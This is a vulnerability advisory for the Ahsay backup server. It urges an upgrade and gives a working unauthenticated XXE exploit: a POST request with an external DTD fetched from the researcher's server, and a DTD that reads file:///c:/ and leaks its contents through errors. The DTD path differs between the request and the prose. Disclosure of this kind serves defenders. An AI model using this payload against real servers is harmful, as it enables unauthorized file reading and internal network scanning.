Advisory

Upgrade to the latest version of Ahsay, currently 8.1.1.50 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)

Technical details

By sending an XXE through the following POST request, the server will trigger an error that will show the content of a file or a directory:

POST /obs/obm8/user/setUserProfile HTTP/1.1
Content-Type: application/octet-stream
Content-Length: 126
Host: 172.16.238.213:80
        
<?xml version="1.0"?>
 <!DOCTYPE root [<!ENTITY % remote SYSTEM "https://www.wbsec.nl/ahsay/oob.dtd"> %remote;%intern; %trick;]>

As you can see it includes the following file https://www.wbsec.nl/xxe/oob.dtd this file is hosted at my server and contains:

<!ENTITY % payl SYSTEM "file:///c:/"><!ENTITY % intern "<!ENTITY &#37;
        trick SYSTEM 'file://:%payl;/%payl;'>">

When the POST request is executed by the server, the server will fetch the file and tries to interpret it but it fails. This will then result in an error message showing the content of the directory. With the XXE it is possible to read files, scan internal networks and request internal systems. We do not have to be authenticated to exploit this.